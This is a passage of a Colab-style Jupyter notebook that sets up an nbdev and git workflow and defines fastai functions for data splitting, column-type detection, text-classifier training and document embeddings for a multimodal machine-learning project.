prompt-toolkit<2.0.0,>=1.0.4 in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (1.0.18)\nRequirement already satisfied: setuptools>=18.5 in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) 
(57.4.0)\nRequirement already satisfied: pexpect in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (4.8.0)\nRequirement already satisfied: simplegeneric>0.8 in /usr/local/lib/python3.7/dist-packages (from ipython>=4.0.0->ipykernel->nbdev) (0.8.1)\nRequirement already satisfied: wcwidth in /usr/local/lib/python3.7/dist-packages (from prompt-toolkit<2.0.0,>=1.0.4->ipython>=4.0.0->ipykernel->nbdev) (0.2.5)\nRequirement already satisfied: qtconsole in /usr/local/lib/python3.7/dist-packages (from jupyter->nbdev) (5.2.2)\nRequirement already satisfied: ipywidgets in /usr/local/lib/python3.7/dist-packages (from jupyter->nbdev) (7.7.0)\nRequirement already satisfied: jupyter-console in /usr/local/lib/python3.7/dist-packages (from jupyter->nbdev) (5.2.0)\nRequirement already satisfied: notebook in /usr/local/lib/python3.7/dist-packages (from jupyter->nbdev) (5.3.1)\nRequirement already satisfied: ipython-genutils~=0.2.0 in /usr/local/lib/python3.7/dist-packages (from ipywidgets->jupyter->nbdev) (0.2.0)\nRequirement already satisfied: jupyterlab-widgets>=1.0.0 in /usr/local/lib/python3.7/dist-packages (from ipywidgets->jupyter->nbdev) (1.1.0)\nRequirement already satisfied: widgetsnbextension~=3.6.0 in /usr/local/lib/python3.7/dist-packages (from ipywidgets->jupyter->nbdev) (3.6.0)\nRequirement already satisfied: terminado>=0.8.1 in /usr/local/lib/python3.7/dist-packages (from notebook->jupyter->nbdev) (0.13.3)\nRequirement already satisfied: Send2Trash in /usr/local/lib/python3.7/dist-packages (from notebook->jupyter->nbdev) (1.8.0)\nRequirement already satisfied: ptyprocess in /usr/local/lib/python3.7/dist-packages (from terminado>=0.8.1->notebook->jupyter->nbdev) (0.7.0)\nRequirement already satisfied: pyparsing!=3.0.5,>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging->nbdev) (3.0.7)\nRequirement already satisfied: qtpy in /usr/local/lib/python3.7/dist-packages (from qtconsole->jupyter->nbdev) (2.0.1)\n" ] ], [ [ "# nbdev 
setup", "_____no_output_____" ], [ "Since we don't have access to our Drive yet, be sure to hit the `Mount Drive` to mount it", "_____no_output_____" ] ], [ [ "#colab\nfrom google.colab import drive\ndrive.mount('/content/drive')", "Mounted at /content/drive\n" ] ], [ [ "Now let's work out of our new library", "_____no_output_____" ] ], [ [ "from pathlib import Path\nimport os\n!pwd", "/content\n" ], [ "git_path = Path('drive/My Drive/fastai_multimodal')\n#git_path = Path('drive/My Drive/techskills')\nos.chdir(git_path)\n!pwd\n", "/content/drive/My Drive/fastai_multimodal\n" ], [ "#export\nfrom nbdev_colab.core import *", "_____no_output_____" ] ], [ [ "We'll make a quick addition function", "_____no_output_____" ], [ "Now let's put in our hooks and update our library. We can just work out of our local directory now as we changed our working directory", "_____no_output_____" ] ], [ [ "#colab\nsetup_git('.', 'fastai_multimodal', 'wjlgatech', 'my-github-token', '[email protected]')", "_____no_output_____" ], [ "#colab\n#git_push('.', '01 after simplify and re-organize this notebook')", "_____no_output_____" ], [ "start = os.getcwd()\nos.chdir('.')\n", "_____no_output_____" ], [ "!nbdev_install_git_hooks\n!nbdev_build_lib\n!git add *", "Executing: git config --local include.path ../.gitconfig\nSuccess: hooks are installed and repo's .gitconfig is now trusted\nConverted 00_core.ipynb.\nConverted 01_modules.ipynb.\nConverted fastai2_multimodal_tabtxt_public.ipynb.\nConverted fastai_multimodal.ipynb.\nConverted index.ipynb.\n" ], [ "!git commit -m \"04/01/22 5:40pm add Error Analysis & bigdata ML 2 solutions\"\n!git push origin master", "[master e6f3cf4] 04/01/22 5:40pm add Error Analysis & bigdata ML 2 solutions\n 11 files changed, 3685 insertions(+), 485 deletions(-)\n rewrite model/tabular_ensemble_enbeddings.pth (94%)\n rewrite model/tabular_model.pth (89%)\nremote: Invalid username or password.\nfatal: Authentication failed for 'https://wjlgatech:[email 
protected]/wjlgatech/fastai_multimodal.git/'\n" ] ], [ [ "# load packages", "_____no_output_____" ] ], [ [ "!pip install fastai wwf bayesian-optimization -q --upgrade \n", "\u001b[?25l\r\u001b[K |▊ | 10 kB 24.8 MB/s eta 0:00:01\r\u001b[K |█▌ | 20 kB 10.2 MB/s eta 0:00:01\r\u001b[K |██▎ | 30 kB 14.1 MB/s eta 0:00:01\r\u001b[K |███ | 40 kB 4.4 MB/s eta 0:00:01\r\u001b[K |███▉ | 51 kB 5.0 MB/s eta 0:00:01\r\u001b[K |████▋ | 61 kB 6.0 MB/s eta 0:00:01\r\u001b[K |█████▎ | 71 kB 6.2 MB/s eta 0:00:01\r\u001b[K |██████ | 81 kB 6.5 MB/s eta 0:00:01\r\u001b[K |██████▉ | 92 kB 7.2 MB/s eta 0:00:01\r\u001b[K |███████▋ | 102 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████▍ | 112 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████▏ | 122 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████▉ | 133 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████▋ | 143 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████▍ | 153 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████▏ | 163 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████ | 174 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████▊ | 184 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████▍ | 194 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████▏ | 204 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████ | 215 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████▊ | 225 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████████▌ | 235 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████████▎ | 245 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████████ | 256 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████████▊ | 266 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████▌ | 276 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████████████▎ | 286 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████████████ | 296 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████████████▉ | 307 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████████████▌ | 317 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████████▎ | 327 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████████████████ | 337 kB 7.6 MB/s eta 
0:00:01\r\u001b[K |█████████████████████████▉ | 348 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████████████████▋ | 358 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████████████████▍ | 368 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████████████ | 378 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████████████▉ | 389 kB 7.6 MB/s eta 0:00:01\r\u001b[K |█████████████████████████████▋ | 399 kB 7.6 MB/s eta 0:00:01\r\u001b[K |██████████████████████████████▍ | 409 kB 7.6 MB/s eta 0:00:01\r\u001b[K |███████████████████████████████▏| 419 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████████████████| 430 kB 7.6 MB/s eta 0:00:01\r\u001b[K |████████████████████████████████| 431 kB 7.6 MB/s \n\u001b[?25h Building wheel for bayesian-optimization (setup.py) ... \u001b[?25l\u001b[?25hdone\n" ], [ "#export\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport requests\nimport re\nimport os\n\nfrom fastai.tabular.all import *\nfrom fastai.text.all import *\nfrom fastai.vision.all import *\n\nimport tensorflow as tf", "_____no_output_____" ] ], [ [ "# setup experiment\n\nNow set up experiemnt by choosing these experiment configs:\n\n- i: which dataset to choose\n- nrows: what large the dataset is\n", "_____no_output_____" ] ], [ [ "#choose the ith dataset\ni = 1\n#choose df size\nnrows=5*10**2\n\n#creat experiment config df\n\nconfig_df = pd.DataFrame({'nrows': [nrows]*5, \n 'data_file': ['df_income.csv','df_entailment.csv', 'df_adoption.csv','df_salary.csv','iu_2022_101_325.csv'],\n 'label_col':[\"income_level\", 'label', 'AdoptionSpeed', 'salary','response_status'],\n 'img_path':[None,'/root/.keras/datasets/tweet_images',None, None,None ]\n })\n\nprint(f\"===========experiment config===========\\n nrows={config_df.loc[i, 'nrows']} \\n data_file={config_df.loc[i,'data_file']}\\n label_col={config_df.loc[i, 'label_col']}\\n img_path={config_df.loc[i, 
'img_path']}\\n===============================\")\ndata_path=['/content/drive/MyDrive/fastai_multimodal/datasets/', '/content/drive/MyDrive/tf_multimodal/datasets/', '/content/drive/MyDrive/techskills_data/'][0]\n# define df, label_col, img_path\ndf = pd.read_csv(data_path+config_df.loc[i,'data_file'], nrows=nrows, index_col=0)\nlabel_col=config_df.loc[i, 'label_col']\nimg_path=config_df.loc[i, 'img_path']\n\n# keep a copy of experiment config\nconfig = {'df':df,\n 'data_path':data_path,\n 'data_file':config_df.loc[i,'data_file'],\n 'label_col':label_col,\n 'img_path':img_path,\n 'nrows':nrows}\n\ndf.tail()\n", "===========experiment config===========\n nrows=500 \n data_file=df_entailment.csv\n label_col=label\n img_path=/root/.keras/datasets/tweet_images\n===============================\n" ], [ "df[label_col].value_counts()/df.shape[0]", "_____no_output_____" ] ], [ [ "# train test split", "_____no_output_____" ] ], [ [ "#export\ndef split_train_valid_test(df, train_valid_test=[0.7,0.15, 0.15], target='response_status', random_state=123, sort_split_by_col='start_datetime'):\n '''Splits a Pandas Dataframe into training, evaluation and serving sets, stratifying on target column.\n\n Args:\n df : pandas dataframe to split\n train_valid_test: a list of 3 positive numbers, each being either float or integer\n target (string): the name of target column\n random_state (int or None): the random seed to shuffle df; if None, do not shuffle df\n sort_split_by_col (str or list of str) e.g.'index', 'start_datetime' or ['start_datetime','event_end_datetime']\n Returns:\n train_df: Training dataframe(i.e. 70% of the entire dataset)\n valid_df: Evaluation dataframe (i.e. 15% of the entire dataset) \n test_df: Serving dataframe (i.e. 
15% of the entire dataset, label column dropped)\n keep_datetime_order (default True): after splitting data into train < validation < serving\n Ref:\n C2W1_assignment.ipynb using TFDV to visulize, validate and moritor data at scale\n '''\n if len(train_valid_test)==3 and not any(x < 0 for x in train_valid_test):\n tot = sum(train_valid_test)\n train_valid_test = [x/tot for x in train_valid_test]\n else: \n raise ValueError('train_valid_test need to be a list of 3 positive numbers!')\n\n if sort_split_by_col is not None:\n if sort_split_by_col=='index':\n df.sort_index(inplace=True) #for ui, datetime info is stored in df.index\n df.reset_index(drop=False, inplace=True)\n \n ls = list(range(df.shape[0])) #range_of(df) \n df.sort_values(by=sort_split_by_col, inplace=True)\n ls_train = ls[:int(df.shape[0]*train_valid_test[0])]\n train_cut_date = df.iloc[ls_train[-1],:][sort_split_by_col]\n train_df = df[df[sort_split_by_col]<=train_cut_date]\n\n ls_test = ls[:int(df.shape[0]*sum(train_valid_test[0:2]))]\n test_cut_date = df.iloc[ls_test[-1],:][sort_split_by_col]\n test_cut_date = max(test_cut_date, train_cut_date)\n test_df = df[df[sort_split_by_col]>test_cut_date]\n\n try: valid_df=df[df[sort_split_by_col]>train_cut_date & df[sort_split_by_col]<=test_cut_date]\n except: valid_df = pd.DataFrame()\n\n ls_train = ls[:int(train_df.shape[0])]\n ls_test = ls[-int(test_df.shape[0]):]\n try: ls_valid = ls[int(train_df.shape[0]):-int(test_df.shape[0])]\n except: ls_valid = []\n n_train, n_valid, n_serv = train_df.shape[0], valid_df.shape[0], test_df.shape[0]\n print('================Double check the indices of train, valid and test are sorted: =================== ')\n print(f'train_df={df.iloc[:n_train,:][sort_split_by_col]}/n')\n print(f'valid_df={df.iloc[n_train:(n_train+n_valid),:][sort_split_by_col]}/n')\n print(f'test_df={df.iloc[(n_train+n_valid):,:][sort_split_by_col]}')\n df.reset_index(drop=True, inplace=True)\n train_df, valid_df, test_df = df.iloc[:n_train,:], 
df.iloc[n_train:(n_train+n_valid),:], df.iloc[(n_train+n_valid):,:]#.drop([target], axis=1)\n return train_df, valid_df, test_df# X_test, y_test\n\n # downstream dl clf can not accept datetime index, therefore df.reset_index() \n df.reset_index(drop=True, inplace=True)\n from sklearn.model_selection import train_test_split\n train_df, eval_serv = train_test_split(df, stratify=df[target], test_size = 1 - train_valid_test[0], random_state=random_state)\n if train_valid_test[1]>0:\n valid_df, test_df = train_test_split(eval_serv, stratify=eval_serv[target], test_size = train_valid_test[1]/(1 - train_valid_test[0]), random_state=random_state)\n else:\n valid_df, test_df = None, eval_serv\n # Serving data emulates the data that would be submitted for predictions, so it should not have the label column.\n #y_test = test_df[target]\n #X_test = test_df.drop([target], axis=1)\n\n return train_df, valid_df, test_df\n\n\n", "_____no_output_____" ], [ "# split df into train_df & test_df NOTE: random split by setting `sort_split_by_col=None`\nif i==4:\n sort_split_by_col='start_datetime'\nelse:\n sort_split_by_col=None\ntrain_df, _, test_df = split_train_valid_test(df, train_valid_test=[0.7,0, 0.3], target=label_col, random_state=123, sort_split_by_col=sort_split_by_col)\ntrain_df.shape, test_df.shape", "_____no_output_____" ] ], [ [ "# identify cnt_cols, cat_cols, txt_cols, img_cols", "_____no_output_____" ] ], [ [ "#export\nimport requests\n\ndef check_path(path):\n \"\"\"check if path is a valid directory or not\"\"\"\n try:\n return os.path.exists(os.path.dirname(path))\n except:\n return False\ndef check_url(path):\n \"\"\"check if path is a valid url or not\"\"\"\n try: return requests.get(path)\n except:\n if 'http' in path:\n return True\n else:\n return False\n\ndef cnt_cat_txt_img_split(df:pd.DataFrame, cnt_card=0.5, excluded_cols = [label_col], txt_card=0.5):\n \"\"\"Helper function that returns column names of cnt, cat (furtherly split into int_cat, str_cat), txt 
variables from given df.\n Args: \n df\n cnt_card (int or float within 0 and 1): cnt cardinarity, e.g. ratio of unique values for cnt column\n label (str default None): the target/dependant varible column name\n txt_card (int or float within 0 and 1): txt cardinarity, e.g. ratio of unique values for txt column\n Return:\n txt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols: (list of str)\n Example:\n txt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols = cnt_cat_txt_split(df, cnt_card=80, label='target', txt_card=0.5)\n\n \"\"\"\n # init placeholder for cnt, cat (int_cat, str_cat), txt\n cnt_cols, cat_cols, txt_cols, img_cols = [], [], [], []\n int_cat_cols, str_cat_cols = [], []\n\n # prep cnt cardinality & txt cardinality\n if cnt_card < 1:\n print(f'before adjustment...cnt_card={cnt_card}')\n cnt_card = int(df.shape[0]*cnt_card)\n print(f'before adjustment...cnt_card={cnt_card}')\n if txt_card < 1:\n print(f'before adjustment...txt_card={txt_card}')\n txt_card = int(df.shape[0]*txt_card)\n print(f'before adjustment...txt_card={txt_card}')\n # exclude target\n cols = set(df.columns) - set(excluded_cols)\n\n # separate cnt, cat, txt columns\n for col in cols:\n if ((pd.api.types.is_integer_dtype(df[col].dtype) and\n df[col].unique().shape[0] > cnt_card) or\n pd.api.types.is_float_dtype(df[col].dtype)): #add to cnt_cols\n cnt_cols.append(col)\n elif (pd.api.types.is_string_dtype(df[col].dtype) and\n df[col].unique().shape[0] > txt_card):\n if all(['.png' in x or '.jpg' in x for x in df[col].sample(10)]): # and (all([check_url(path) for path in df[col].sample(10)]) or all([check_path(path) for path in df[col].sample(10)])): #check 10 samples to see if they are either valid url or valid path \n img_cols.append(col)\n else: #add to txt_cols\n txt_cols.append(col)\n else: #add to cat_cols\n cat_cols.append(col)\n if pd.api.types.is_integer_dtype(df[col].dtype): #separate cat_cols into int_cat_cols and str_cat_cols\n 
int_cat_cols.append(col)\n else:\n str_cat_cols.append(col)\n return sorted(txt_cols), sorted(cnt_cols), sorted(cat_cols), (sorted(int_cat_cols), sorted(str_cat_cols)), sorted(img_cols)", "_____no_output_____" ], [ "# determine cnt, cat, txt, img columns and define global variables\ntxt_cols, cnt_cols, cat_cols, (int_cat_cols, str_cat_cols), img_cols= cnt_cat_txt_img_split(df=df, cnt_card=20, excluded_cols = [label_col], txt_card=0.1)\nprint(f'Given label_col={label_col}\\n======= automatically identify \\n cnt_cols={cnt_cols}\\n cat_cols={cat_cols},\\n img_cols={img_cols}, \\n txt_cols={txt_cols} \\n======= make sure that is what you expect!')\n", "before adjustment...txt_card=0.1\nbefore adjustment...txt_card=50\nGiven label_col=label\n======= automatically identify \n cnt_cols=[]\n cat_cols=[],\n img_cols=['image_1_path', 'image_2_path'], \n txt_cols=['text_1', 'text_2'] \n======= make sure that is what you expect!\n" ], [ "if i ==4: #manually adjust\n cnt_cols=['age', 'cumulative_peer_exit_count', 'is_optional', 'is_organizer', 'length_of_service', 'manager_length_of_service', 'meeting_lapse', 'num_direct_reports', 'start_datetime_Dayofyear', 'time_since_last_promotion', 'time_since_new_manager_start_date', 'time_since_new_org_start_date', 'timestamp']\n cat_cols=[ 'job_family', 'start_datetime']\n img_cols=[]\n txt_cols=['description', 'title']\n excluded_cols=['event_id',]\n x_cols = cnt_cols+cat_cols+img_cols+txt_cols\n i_cols = ['description', 'title', 'start_datetime', 'meeting_lapse', 'start_datetime_Dayofyear', 'timestamp'] # item features\n u_cols = list(set(x_cols)-set(i_cols)) # user features\n\n print(f'meeting features: {i_cols}') # to generate item embeddings\n print(f'user features: {u_cols}') # to generate user embeddings", "_____no_output_____" ], [ "# store column-info in a unchangable variable\nclass CONST(object):\n __slots__ = ()\n cat_cols = cat_cols\n cnt_cols = cnt_cols\n txt_cols = txt_cols\n img_cols = img_cols\n label_col = 
label_col\n\n\nc = CONST()\nc.cat_cols, c.cnt_cols, c.txt_cols, c.img_cols", "_____no_output_____" ] ], [ [ "# 1) fastai text classifier\n\nThe limitation of fastai text classifier is that it only accept 1 txt_col. To deal with this limitation, I have 2 options:\n\n- run fastai text classifier through each of txt_cols and then later combine the output through some ensemble learner.\n\n- combine all txt_cols into one text col and run fastai text classifier", "_____no_output_____" ], [ "## module1: train|reload|inference with fastai_text_classifier", "_____no_output_____" ] ], [ [ "#export\n#! [ -e /content ] && pip install -Uqq fastai # upgrade fastai on colab\n#from fastai.text.all import *\n\ndef train_fastai_text_classifier(df:pd.DataFrame, txt_col:str, label_col:str, model_path:str, lr:float=0.005, max_epochs:int=100, emb_size:int=128):\n \"\"\"train a fastai text classifier and get its performance metrics\n Args:\n df:pd.DataFrame the dataframe containing text_col and label_col\n txt_col:str e.g. 'hard_skills_name' \n label_col:str e.g. 'label'\n model_path:str e.g. 
'/content/drive/My Drive/techskills/model/'\n flag_auto_lr:bool=False whether or not use auto search learning rate; if False, use default value 0.005 \n max_epochs:int=100\n emb_size:int=128\n Returns:\n lm: the trained language model\n clf: the trained fastai text classification model \n \"\"\"\n\n #metrics\n f1=FBeta(beta=1, average='weighted')\n precision = Precision(average='weighted')\n recall = Recall(average='weighted')\n metrics=[accuracy, precision, recall, f1]\n \n # get `dataloader` object for language model\n dls_lm = TextDataLoaders.from_df(df[[txt_col, label_col]], is_lm=True, text_col=txt_col, label_col=label_col, valid_pct=0.2, seed=123)\n\n #-----build a language model\n # init language model\n \"\"\"config = awd_lstm_lm_config.copy()\n config['emb_sz'] = emb_size\"\"\"\n lm = language_model_learner(dls_lm, AWD_LSTM, drop_mult=0.5, metrics=[accuracy, Perplexity()], wd=0.1).to_fp16()\n\n # auto learning rate for lm\n if lr is None:\n lr_lm=list(lm.lr_find())[0]\n print(f'auto identified learning rate lr_lm={lr_lm}')\n else:\n lr_lm = lr\n # train lm learner\n lm.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=slice(lr_lm/(2.6**4), lr_lm))\n\n # furtherly fine tune lm learner\n #lm.fit_one_cycle(5, slice(lr_lm/10,lr_lm * 10))\n\n # Create model_path if it does not exist \n import os\n if not os.path.exists(model_path):\n os.makedirs(model_path)\n\n # save lm and its encoder; The model not including the final layer is called the encoder\n lm.save(model_path+txt_col+'_lm')\n lm.save_encoder(model_path+txt_col+'_lm_encoder')\n\n #======build a text classifier\n # get `dataloader` object for classification model;\n dls_clf = TextDataLoaders.from_df(df[[txt_col, label_col]], text_col=txt_col, label_col=label_col, valid_pct=0.2, seed=123, text_vocab=dls_lm.vocab)\n clf = text_classifier_learner(dls_clf, AWD_LSTM, drop_mult=0.5, metrics=metrics).to_fp16()\n clf.load_encoder(model_path+txt_col+'_lm_encoder')\n\n # auto learning rate\n if lr is 
None:\n lr_clf=list(clf.lr_find())[0]\n print(f'auto identified learning rate lr_clf={lr_clf}')\n else:\n lr_clf = lr\n # train learner\n clf.fit_flat_cos(max_epochs, cbs=[EarlyStoppingCallback()], lr=slice(lr_clf/(2.6**4), lr_clf))\n\n # furtherly fine tune clf learner\n #clf.fit_one_cycle(5, slice(lr_clf/(2.6**4), lr_clf))\n\n #unfreeze all except the last 2 layers & retrain\n clf.freeze_to(-2)\n clf.fit_one_cycle(1, slice(lr_clf/(2.6**4), lr_clf))\n\n #unfreeze all except the last 3 layers & retrain\n clf.freeze_to(-3)\n clf.fit_one_cycle(1, slice(lr_clf/(2.6**4), lr_clf))\n\n # last, unfreeze the whole model & retrain\n clf.unfreeze()\n #clf.fit_one_cycle(5, slice(1e-3/(2.6**4),1e-3))\n clf.fit_flat_cos(100, cbs=[EarlyStoppingCallback()], lr=slice(lr_clf/(2.6**4), lr_clf))\n\n # save the state of the model, it create a file in `learn.path/models/` named 'baseline_model.pth'\n clf.save(model_path+txt_col+'_classifier')\n return lm, clf\n\ndef load_fastai_text_classifier(df:pd.DataFrame, txt_col:str, label_col:str, model_path:str, lr:float=0.005):\n \"\"\"train a fastai text classifier and get its performance metrics\n Args:\n df:pd.DataFrame the dataframe containing text_col and label_col\n txt_col:str e.g. 'hard_skills_name' \n label_col:str e.g. 'label'\n model_path:str e.g. 
'/content/drive/My Drive/techskills/model/'\n lr:float=0.005\n #emb_size:int=128\n #flag_auto_lr:bool=False whether or not use auto search learning rate; if False, use default value 0.005 \n Returns:\n lm: the trained language model\n clf: the trained fastai text classification model \n \"\"\"\n\n #metrics\n f1=FBeta(beta=1, average='weighted')\n precision = Precision(average='weighted')\n recall = Recall(average='weighted')\n metrics=[accuracy, precision, recall, f1]\n \n # get `dataloader` object for language model\n dls_lm = TextDataLoaders.from_df(df[[txt_col, label_col]], is_lm=True, text_col=txt_col, label_col=label_col, valid_pct=0.2, seed=123)\n\n #-----build a language model\n # init language model\n \n lm = language_model_learner(dls_lm, AWD_LSTM, drop_mult=0.5, metrics=[accuracy, Perplexity()], wd=0.1).to_fp16()\n\n # save lm and its encoder; The model not including the final layer is called the encoder\n lm.load(model_path+txt_col+'_lm')\n lm.load_encoder(model_path+txt_col+'_lm_encoder')\n\n #======build a text classifier\n # get `dataloader` object for classification model;\n dls_clf = TextDataLoaders.from_df(df[[txt_col, label_col]], text_col=txt_col, label_col=label_col, valid_pct=0.2, seed=123, text_vocab=dls_lm.vocab)\n clf = text_classifier_learner(dls_clf, AWD_LSTM, drop_mult=0.5, metrics=metrics).to_fp16()\n clf.load_encoder(model_path+txt_col+'_lm_encoder')\n\n\n # save the state of the model, it create a file in `learn.path/models/` named 'baseline_model.pth'\n try: \n clf.load(model_path+txt_col+'_classifier')\n except: # in case can not load the trained classifier, retrain it\n # auto learning rate\n if lr is None:\n lr_clf=list(clf.lr_find())[0]\n print(f'auto identified learning rate lr_clf={lr_clf}')\n else:\n lr_clf = 0.005\n # train learner\n clf.fit_flat_cos(100, cbs=[EarlyStoppingCallback()], lr=lr_clf)\n \n # furtherly fine tune clf learner\n #clf.fit_one_cycle(5, slice(lr_clf/10, lr_clf*10))\n\n #unfreeze all except the last 2 
layers & retrain\n clf.freeze_to(-2)\n clf.fit_one_cycle(1, slice(1e-2/(2.6**4),1e-2))\n\n #unfreeze all except the last 3 layers & retrain\n clf.freeze_to(-3)\n clf.fit_one_cycle(1, slice(5e-3/(2.6**4),5e-3))\n\n # last, unfreeze the whole model & retrain\n clf.unfreeze()\n clf.fit_one_cycle(5, slice(1e-3/(2.6**4),1e-3))\n # save the state of the model, it create a file in `learn.path/models/` named 'title_raw_classifier.pth'\n clf.save(model_path+txt_col+'_classifier')\n return lm, clf\n\ndef fastai_learner_preds(learner, df, label_col, txt_col:str=None):\n \"\"\"use a trained fastai learner to make prediction on df[txt_col] \n Args:\n learner: a trained fastai text learner (model)\n test_df:pd.DataFrame e.g. df[[img_col]]\n txt_col:str=None e.g. 'Skills_resume', 'title_raw'\n ATTENSION: test_df need to have the same features which learner was trained on \n Returns:\n preds:np.array of shape (num_samples,)\n probs:np.array of shape (num_samples, num_classes)\n Example:\n #make sure the txt_col is renamed as 'text'\n df = df[[txt_col]].copy().rename({txt_col:'text'}, axis=1)\n\n #make sure NaN value (of which the dtype is of np numeric) is replaced by '' (dtype is str)\n df['text'].fillna('', inplace=True)\n\n preds, probs = fastai_learner_preds(learner=clf0, df)\n \n \"\"\"\n # in case of deal with txt_col, do some preprocessing on test_df[[txt_col]]\n if txt_col is not None: \n #make sure the txt_col is renamed as 'text'\n df = df[[txt_col]].copy().rename({txt_col:'text'}, axis=1)\n\n #make sure NaN value (of which the dtype is of np numeric) is replaced by '' (dtype is str)\n df['text'].fillna('', inplace=True)\n test_df = df.copy()\n if label_col in test_df.columns:\n test_df.drop([label_col], axis=1, inplace=True)\n dl = learner.dls.test_dl(test_df) #, with_labels=True\n probs, _ = learner.get_preds(dl=dl)\n preds = probs.numpy().argmax(axis=1)\n return preds, probs\n", "_____no_output_____" ], [ "\"\"\"# train txt classifier(s), each is corresponding to 
every txt_cols\nlms=[]\ntxt_clfs=[]\n\nfor txt_col in txt_cols:\n lm0, txt_clf0 = train_fastai_text_classifier(df, \n txt_col=txt_col,\n label_col=label_col,\n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n lr=0.005\n )\n lms.append(lm0)\n txt_clfs.append(txt_clf0)\"\"\"\n", "_____no_output_____" ], [ "\"\"\"# re-load each text classifier trained w. each of txt_cols\nlms=[]\ntxt_clfs=[]\n\nfor txt_col in txt_cols:\n lm0, clf0 = load_fastai_text_classifier(df, \n txt_col=txt_cols[0],\n label_col=label_col,\n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n lr=0.005\n )\n lms.append(lm0)\n txt_clfs.append(txt_clf0)\"\"\"\n ", "_____no_output_____" ] ], [ [ "## module: get_fastai_docs_embs\n\nInstead of using out of box embedding methods (tfidf, USE, SBERT), I want to use classifier based embedding method to calculate document embedding.\n\nReferences:\n\n- [Getting Document Encodings From ULMFiT (updated for Fastai v2)](https://alanjjian.medium.com/getting-document-encodings-from-ulmfit-updated-for-fastai-v3-7444904011fe)\n\n- [Tutorial on SPAM detection using fastai ULMFiT - Part 1: Language Model](https://drive.google.com/drive/u/0/folders/13uo91qC4cUFPepeRCg5XXoBCFqg3Q2Mn)\n", "_____no_output_____" ] ], [ [ "#export\ndef get_fastai_docs_embs(docs:list, learn, lm, df=None, txt_col=None):\n \"\"\"use classifier to get document embedding vector (np.array)\n Args:\n docs:list of str e.g. ['Python (programming language)', 'Data Science', 'git, GitHub, NLP']\n learn: e.g. fastai.text.learner.TextLearner\n lm: e.g. 
fastai.text.learner.LMLearner language model to generate numericalizer and tokenizer\n df[txt_col] to generate language model's dataloader (dls_lm), numericalizer and tokenizer\n Returns:\n embs: a num_samples long list of 400D vector\n\n Examples:\n get_docs_embs(docs=['Python (programming language)', 'Data Science', 'git, GitHub, NLP'], learn=clf1, lm=lm1, df=None, txt_col=None)\n get_docs_embs(docs=['Python (programming language)', 'Data Science', 'git, GitHub, NLP'], learn=clf1, lm=None, df=df, txt_col=txt_cols[1])\n \"\"\"\n # Utilize DataBlock API to process and load data\n if (df is not None) and (txt_col is not None):\n dls_lm = DataBlock(blocks=TextBlock.from_df(text_cols=txt_col, is_lm=True),\n get_x=ColReader('text'),\n splitter=RandomSplitter(0.1)).dataloaders(df, bs=128,seq_len=80) \n numericalizer = Numericalize(vocab=dls_lm.vocab)\n tokenizer = dls_lm.tokenizer\n elif lm is not None:\n numericalizer = Numericalize(vocab=lm.dls.vocab)\n tokenizer = lm.dls.tokenizer\n \n #preprocess docs\n embs = []\n for doc in docs:\n xb = numericalizer(tokenizer(doc))\n xb = xb.reshape((1, xb.size()[0]))\n awd_lstm = learn.model[0]\n awd_lstm.reset()\n with torch.no_grad():\n try:\n out = awd_lstm.eval()(xb.cuda()) #to deal with 'all-tensors-to-be-on-the-same-device error', add `.cuda(). 
Ref: https://stackoverflow.com/questions/64929665/pytorch-running-runtimeerror-expected-all-tensors-to-be-on-the-same-device-bu\n except:\n out = awd_lstm.eval()(xb) \n embs.append(out[0].cpu().max(0).values.detach().numpy().sum(axis=0).reshape(-1,)) #out[0].cpu() is to copy tensor from GPU(cuda) to CPU\n return embs\n\n", "_____no_output_____" ], [ "\"\"\"# load lm and clf based on txt_cols[0]\nlm, clf = load_fastai_text_classifier(df, \n txt_col=txt_cols[0],\n label_col=label_col,\n model_path='/content/drive/My Drive/fastai_multimodal/model/',\n lr=0.005\n )\"\"\"\n", "_____no_output_____" ], [ "\"\"\"#dbck: expect the 2 set of vectors producted by the 2 methods are highly correlated \n# get docs embeddings e1 by method1\ne1 = get_fastai_docs_embs(docs=df[txt_cols[0]] #['Python (programming language)', 'Data Science', 'git, GitHub, NLP']\n, learn=clf, lm=lm, df=None, txt_col=None)\n# get docs embeddings e2 by method2\ne2 = 